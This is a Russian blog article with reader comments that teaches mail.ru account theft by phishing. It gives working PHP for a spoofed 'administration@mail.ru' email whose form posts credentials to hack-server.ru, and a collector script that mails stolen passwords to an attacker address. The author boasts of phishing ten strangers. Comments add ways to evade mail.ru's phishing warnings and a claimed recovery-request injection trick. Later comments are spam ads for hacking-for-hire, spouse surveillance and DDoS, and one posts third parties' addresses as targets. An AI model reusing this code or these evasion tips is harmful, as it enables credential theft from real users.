Взлом email. Социальная инженерия

Не буду взламывать сервер, не буду использовать sql-инъекции, не буду воровать cookies. Потому что большинство этих способов уже не работает – дыры в почтовых сервисах залатывают. Большинство статей по взлому почты безнадежно устарели. Буду использовать социальную инженерию.

Социальная инженерия - это метод несанкционированного доступа к информации или системам хранения информации без использования технических средств. Метод основан на использовании слабостей человеческого фактора и считается очень разрушительным. Злоумышленник получает информацию, например, путем сбора информации о служащих объекта атаки, с помощью обычного телефонного звонка или путем проникновения в организацию под видом ее служащего. Злоумышленник может позвонить работнику компании (под видом технической службы) и выведать пароль, сославшись на необходимость решения небольшой проблемы в компьютерной системе. Очень часто этот трюк проходит.

Пользователю приходит письмо от администрации mail.ru, в котором написано что мы переходим на новое оборудование и ваш ящик переносится на другой сервер. Поэтому вы должны подтвердить ваши данные. Чуть ниже размещена форма для ввода данных (имя, текущий пароль и т.д.). Далее пользователь заполняет форму, нажимает кнопку отправить и данные уходят на другой сервер, где сохраняются, а потом его перекидывает обратно на mail.ru. Все это проходит незаметно для пользователя. Единственная проблема чтобы пользователь поверил в правдивость письма. Для этого подделывается ящик отправителя administration@mail.ru и все фразы в тексте должны быть стандартными (вроде “благодарим Вас за понимание…”).

Подделываем письмо.

<?php
$subject="Внимание! Перенос вашего аккаунта!";
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="From: Администрация Mail.Ru <administration@mail.ru>\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="<body>
<table width=100% height=40 cellpadding=0 cellspacing=0 class=blue  bgcolor='#00468C'>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
<td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td>
<td width=100%> </td>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
</table>
<br>
<b>Уважаемый пользователь name@mail.ru!</b><br>
От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение
вам некоторых неудобств.
В связи со сменой нашего оборудования на более новое нам нужно
перенести часть аккаунтов на новое оборудование.
Соответственно просим повторно прислать некоторую информацию о своем аккаунте.
Это нужно для предотвращения всякого рода ошибок и неточностей.<br>
<b><font color='#ff0000'>В противном случае Вы можете лишиться своего
почтового ящика!</font></b><br><br>
<b>Заполните нижеприведенную форму:</b>
<form method='post' action='http://hack-server.ru/form.php'>
<table width='400px' cellpadding=0 cellspacing=0>
<tr><td><b>Логин: </b></td><td><input type='text' name='login'>@mail.ru</td></tr>
<tr><td><b>Пароль: </b></td><td><input type='password' name='pass'></td></tr>
<tr><td><b>Подтвердите пароль: </b></td><td><input type='password' name='pass2'></td></tr>
<tr><td><b>Имя: </b></td><td><input type='text' name='name'></td></tr>
<tr><td><b>Фамилия: </b></td><td><input type='text' name='family'></td></tr>
</table>
<input type='submit' value='Отправить'>
</form>
Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br>
С уважением, администрация Mail.ru
<br><br><br><br><br></body>";
mail('name@mail.ru', $subject, $msg, $header);
?>

Кстати, этим способом можно отправлять письмо от имени любого человека. В таком виде письмо придет пользователю.

взлом email

После того, как пользователь заполнил форму и отправил, содержимое формы приходит в скрипт, который вы указали в теге form. Нам лишь остается взять эти данные и перекинуть пользователя обратно.

<?php
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";    

$msg = $_POST['login'];
$subject  = 'логин: '.$_POST['login'].'<br>';
$subject .= 'пароль: '.$_POST['pass'].'<br>';
$subject .= 'имя: '.$_POST['name'].'<br>';
$subject .= 'фамалия: '.$_POST['family'];    

mail("hacker@ya.ru", $msg, $subject, $header);
$location = $_SERVER['HTTP_REFERER'];
header("Location: http://win.mail.ru/cgi-bin/start?top=1");
?>

Как видно нам необходим сервер, с которого нужно отправить письмо и обработать форму. Я регистрировал сайт на бесплатном хостинге с php. Сейчас этот хостинг закрылся, но если поискать, то найти бесплатный хостинг с php можно.

Тестирование. Тренироваться будем на кошках. Я решил взять 10 случайных девочек. Почтовые адреса можно взять на mail-ответы. Все ящики открыты. Нужно лишь навести курсор на иконку mail-агента.

взлом email

Отправил письма. К вечеру все 10 паролей были у меня.

Разумеется, данный способ рассчитан на простых пользователей. Тем не менее, до сих пор работают нигерийские письма, так что будьте бдительны!

#1

уха-ха похлеще анекдотов, Серёга, вариант с девушками просто портясающий.
Правда телефонные звонки - это большой гемор, да и проканает с гораздо меньшим успехом.

Cheman, 5.04.2008 - 01:02
#2

10 из 10? :) Вверх эффективности.

На свиданки так же разводить.

GogA, 3.12.2008 - 03:57
#3

а куда логи созраняються вот я залил на сервер,отправил письмо,ввёл данные нажал отправить он выполнил скрипт и я оказался в ящике а куда пароль сохранился?

xxx, 10.02.2009 - 14:05
#4

mail("hacker@ya.ru", $msg, $subject, $header);

пароль улеттел на почту hacker@ya.ru

admin, 10.02.2009 - 14:33
#5

Чет тут туповато описано,написанно только коды а вот че с ними нужно делать нет создавать страницы или чего

Aleksey, 14.03.2009 - 17:25
#6

да ваще тупая статья закорючки какие-то куда их вставлять-то нада или чего

ууу, 23.03.2009 - 10:52
#7

статья написана для тех кто знает немного PHP

admin, 24.03.2009 - 01:50
#8

Кто-нибудь знает как решить такую проблему: делаю все как надо, и работает, и пароль присылается, но! Пробовал на своем же собственном ящике все это делать. И на mail.ru в конце письма вставляется надпись красными буквами, что типа администрация mail.ru никогда не требует прислать пароль от ящика и т.д. и т.п. и не попадайтесь на уловки мошенников. Как можно схитрить, чтобы эта надпись не появлялась?

Михаил, 25.03.2009 - 02:30
#9

Видимо уже закрыли эту "дырку". Этот способ я пробовал 2 года назад.

Нужно экспериментировать с текстом. Они на автомате смотрят в письме наличие опасных слов. Нужно убрать оттуда фразы "Администрация mail.ru", "выслать пароль" и др. Можно заменить их на "безобидные" синонимы или на английский язык.

admin, 25.03.2009 - 02:37
#10

Вроде как получилось, хотя и с некоторыми потерями. Долго экспериментировал и пришел к такому варианту. Во-первых, нужно заменить в тексте формы надписи "Пароль" и "Подтвердите пароль" на картинки с этими надписями, сделанные через принт скрин и пэйнт. Во-вторых, нужно заменить в коде странцицы в полях "Пароль" и "Подтвердите пароль" type='password' на type='text'. Правда при этом не будут появляться звездочки при вводе пароля, а все будет открытым текстом вводится, что уменьшает правдоподобность, но по другому я пока не придумал. В-третьих, нужно заменить в этих же строчках name='pass' и name='pass2' на name='pole' и name='pole2'. Конечно можно и не pole, а все что в голову прийдет, лишь бы не pass.:-) И, наконец, в-четвертых, в файле form.php также заменить в строчке $subject .= 'пароль: '.$_POST['pass'].''; слово pass на pole. Таким образом мэйл.ру никаких комментариев не вставляет.

Михаил, 26.03.2009 - 04:09
#11

Кстати, удобно все это делать в программе Mozilla Thunderbird. Редактировать удобно, да и HTML вставляет без проблем.

Михаил, 26.03.2009 - 04:11
#12

Михаил, а можно както с вами связаться, дабы вы проинструктировали меня по этой теме?

Sega, 29.03.2009 - 19:26
#13

Да я и сам не особо знаток, просто кое-как разобрался. А что конкретно вам непонятно? Пишите прямо здесь, чем смогу помогу.

Михаил, 30.03.2009 - 14:04
#14

а куда этот весь код вписывать? и можете точнее написать для чайников, не фига не понял.

андрей, 27.06.2009 - 14:07
#15

Нужно создать php-страницу и запустить ее.
Если ты не знаешь как это делать, то данная статья не для тебя.

admin, 27.06.2009 - 14:13
#16

я видел как один парень не буду говорить это слово скажу так открыл не законно почту, без писем, не то что здесь ждешь пока придет письмо, а он быстро, он знал только адрес почты человека, зашел меню пуск там есть кнопка выполнить он нажал , а дальше я не знаю что он набрал там, пароль сразу пришел, Может кто знает как быстро узнать пароль на почту?. Подскажите.

андрей, 30.06.2009 - 22:39
#17

люди ув меня не получаеться просто нажимаю отправить письмо пишу кому отправил и мне текс приходит со всякими закарчками ну такойже как даёт нам автор статьи как зделать так что быон пришёл нормально и от администрации маил ру

Flash, 3.08.2009 - 07:07
#18

Почему то у меня не перебрасывает пользователя обратно к нему на http://win.mail.ru/cgi-bin/start?top=1

Den, 9.08.2009 - 01:16
#19

Как избавиться от ява скрипта? У меня все получается, о чем здесь написал автор. Проблема в том что когда жертва жмент отправить выскакивает ява скрипт, который предупреждает что данные с формы полетят на такой .... сайт. Как зделать чтобы этот скрипт обойти?

Den, 10.08.2009 - 07:41
#20

#19 Скорее всего уже никак. Эту дырку прикрыли путем предупреждения пользователя. Остается надеяться, что пользоватлель нажмет кнопку ОК.

admin, 10.08.2009 - 08:29
#21

Взлом почты на Mail.ru Всё очень просто. По адресу pass_recowery@mail.ru сидит mail-робот, который
анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу
шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со
специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся
будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем
два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ;) )
Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pasword_remind@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они
правильные!
login=hacker&pass=qwerty&answer=
Итого: тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!! (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы
разделяются точкой с запятой.

саша, 18.08.2010 - 16:20
#22

не катит уже, mail.ru распознаёт action=''
и даёт предупреждение что типо не вводите данные

саша, 9.12.2010 - 03:22
#23

А как ты вообще на его ящик попал? Вот я проверил на своём ящике,всё ввёл пвильно,а как потом я смогу попать на тот ящик,чью информацию ввёл?И как ты вообще оказался в почте пользователя? или это уже не работает?

#3, 24.03.2011 - 14:32
#24

mojew vzlamat' zdes 2 devo4ki est' 9 te mail skinu dal'we sam posmotrew viru4ai)))aika_jan01@mail.ru jalairo4ka99@mail.ru

Rustem, 1.05.2012 - 18:36
#25

#21 пиздабол 80 уровня:) зачем боту твой пароль блять?

SM, 25.07.2013 - 19:38
#26

я протестировал, работает нормально только с кодировкой немного проблемы, автору респект

asher, 4.08.2014 - 18:20
#27

Люди, а вот я тут подумал, что если не использовать action=", а использовать JS, прокатит не у всех, но у многих

PHP Coder, 27.08.2015 - 20:43
#28

вот обратилась к Олегу мне помог с перепиской моего супруга в соц сети, спасибо вам
вот его почта: mail_crack@rocketmail.com

olya, 26.12.2016 - 13:48
#29

Услуги хакера на заказ! Взлом почты / Взлом Вконтакте / Одноклассников

Хотите узнать с кем общается Ваша половинка в интернете?
Желаете всегда быть в курсе дел Ваших конкурентов?
Нужно узнать секреты или поймать на лжи?
Взломать страницу мужа / Взломать страницу жены
Устранение негативных отзывов / Убрать отзыв с сайта
Устранение конкурентов

Тогда наш сервис для Вас!

Так же осуществляем взлом соц. сетей:
odnoklassniki/ Одноклассники
vkontakte / Вконтакте
mamba / сайт знакомств
facebook / фейсбук
и т.д.

РАСПЕЧАТКА СМС СООБЩЕНИЙ И ЗВОНКОВ
Удаление кредитной истории!
DDOS на сайты конкурентов

Также вернем Ваш ящик, если его взломали и поменяли пароль

БЫСТРО! КАЧЕСТВЕННО! ПРОФЕССИОНАЛЬНО!
Наш сервис - действительно лучший.

Не теряйте времени, пишите прямо сейчас.email: istxack@gmail.com

Николай, 15.03.2019 - 21:39
#30

Могу помочь с этим,
если кому требуется,
пишите на почту: mail.crack.ru@ya.ru

oleg, 25.03.2019 - 18:42
#31

Взлом и подбор паролей на почтовых сервисах
и социальных сетях.

Работаем со всеми бесплатными почтовыми сервисами,
а так же cо всеми соц. сетями, сайтами знакомств,
блогами, ICQ, твиттер, а так же
РАСПЕЧАТКА СМС,WHATSAPP,VIBER
ДЕТАЛИЗАЦИЯ ЗВОНКОВ (NEW).

Профессионально
Конфиденциально.
Оплата по факту выполнения заказа.
Оперативные сроки.
Индивидуальные цены от 500р.

mail_crack@rocketmail.com
Круглосуточно.

crack, 25.03.2019 - 18:42
#32

Нужны услуги Bзлoma?
Распечатка переписки в вк,смс,whatsapp,viber и тд.
Захoди на caйт:
http://pro-vzl.ru

WWW.PRO-VZL.RU, 27.03.2019 - 20:14
#33

**=УСЛУГИ ПРОГРАММИСТА=**
--****ПО ВЗЛОМУ****--
ПО ВОПРОСАМ ЗАКАЗА ОБРАЩАТЬСЯ:

****Почта: vzlom.alexei@gmail.com
тел. 8-960-233-75-37

Предоставляем:

Социальные сети:

*Вконтакте (vkontakte.ru)*Одноклассники (odnoklassniki.ru)
*loveplanet.ru*Facebook кккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккккк
-----------------------------------------------------------------------------------------
*Icq *qip
-----------------------------------------------------------------------------------------
Почта:

*mail.ru *yandex.ru
*rambler.ru *gmail.com
*ukr.net *yahoo.com
*hotmail.com *qip-pochta
*mamba.ru
-также корпоротивные почты
------------------------------------------------------------------------------------------
*Сайты знакомств, рассмотреть можно любые
*Могу вернуть взломанную анкету или забытый пароль
------------------------------------------------------------------------------------------

ГАРАНТИИ:
- Профессиональный подход
- Предоставление доказательств взлома
- Пароль при взломе не меняется, "жертва" будет продолжать
пользоваться анкетой, ничего не подозревая
- Минимальные сроки выполнения от 20минут до 3х часов
- Простейшая и удобная система оплаты: яндекс деньги,
webmoney или просто на мобильный телефон
------------------------------------------------------------------------------------------

ПО ВОПРОСАМ ЗАКАЗА ОБРАЩАТЬСЯ:

****Почта: vzlom.alexei@gmail.com
тел. 8-960-233-75-37

alexei, 13.04.2019 - 12:19
#34

Взлом и подбор паролей на почтовых сервисах
и социальных сетях.

Работаем со всеми бесплатными почтовыми сервисами,
а так же cо всеми соц. сетями, сайтами знакомств,
блогами, ICQ, твиттер, а так же
РАСПЕЧАТКА СМС,WHATSAPP,VIBER
ДЕТАЛИЗАЦИЯ ЗВОНКОВ (NEW).

Профессионально
Конфиденциально.
Оплата по факту выполнения заказа.
Оперативные сроки.d
Индивидуальные цены от 500р.

mail_crack@rocketmail.com
Круглосуточно.

crack, 14.04.2019 - 03:43
#35

e--

Взлом и подбор паролей на почтовых сервисах
и социальных сетях.

Работаем со всеми бесплатными почтовыми сервисами,
а так же cо всеми соц. сетями, сайтами знакомств,
блогами, ICQ, твиттер, а так же
РАСПЕЧАТКА СМС,WHATSAPP,VIBER
ДЕТАЛИЗАЦИЯ ЗВОНКОВ (NEW).

Профессионально
Конфиденциально.
Оплата по факту выполнения заказа.
Оперативные сроки.
Индивидуальные цены от 500р.

mail_crack@rocketmail.com
Круглосуточно.

crack, 14.04.2019 - 03:43
#36

-
-
-
-
-

Взлом и подбор паролей на почтовых сервисах
и социальных сетях.

Работаем со всеми бесплатными почтовыми сервисами,
а так же cо всеми соц. сетями, сайтами знакомств,
блогами, ICQ, твиттер, а так же
РАСПЕЧАТКА СМС,WHATSAPP,VIBER
ДЕТАЛИЗАЦИЯ ЗВОНКОВ (NEW).

Профессионально
Конфиденциально.
Оплата по факту выполнения заказа.
Оперативные сроки.
Индивидуальные цены от 500р.

mail_crack@rocketmail.com
Круглосуточно.

crack, 14.04.2019 - 03:44
#37

Профессиональные услуги взлома:
1.Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей.
2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com
- live.com
- mail.com
- aol.com
- hotmail.com
- mail.ru
- yandex.ru
- bk.ru
- rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта...
3. Взлом Skype и любой другой телефонии.
4.- Взлом viber
- whatsapp и любых других приложений.
5.Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.
- Анонимность и конфиденциальность полностью соблюдается
- Разумные цены
- Индивидуальный подход к каждому клиенту
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
- Профессиональное обучение взлому, результат успешного обучения 100%.
ОБРАЩАТЬСЯ:
*Почта: pomosh.vzloma@gmail.com
*Вконтакте:vk.com/pomosh.vzloma
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Профессиональные услуги взлома:
1.Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей.
2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com
- live.com
- mail.com
- aol.com
- hotmail.com
- mail.ru
- yandex.ru
- bk.ru
- rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта...
3. Взлом Skype и любой другой телефонии.
4.- Взлом viber
- whatsapp и любых других приложений.
5.Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.
- Анонимность и конфиденциальность полностью соблюдается
- Разумные цены
- Индивидуальный подход к каждому клиенту
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
- Профессиональное обучение взлому, результат успешного обучения 100%.
ОБРАЩАТЬСЯ:
*Почта: pomosh.vzloma@gmail.com
*Вконтакте:vk.com/pomosh.vzloma
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Профессиональные услуги взлома:
1.Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей.
2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com
- live.com
- mail.com
- aol.com
- hotmail.com
- mail.ru
- yandex.ru
- bk.ru
- rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта...
3. Взлом Skype и любой другой телефонии.
4.- Взлом viber
- whatsapp и любых других приложений.
5.Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.
- Анонимность и конфиденциальность полностью соблюдается
- Разумные цены
- Индивидуальный подход к каждому клиенту
- Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
- Постоянным клиентам - солидные скидки
- Профессиональное обучение взлому, результат успешного обучения 100%.
ОБРАЩАТЬСЯ:
*Почта: pomosh.vzloma@gmail.com
*Вконтакте:vk.com/pomosh.vzloma

pomoshvzloma, 24.04.2019 - 11:13
Оставить комментарий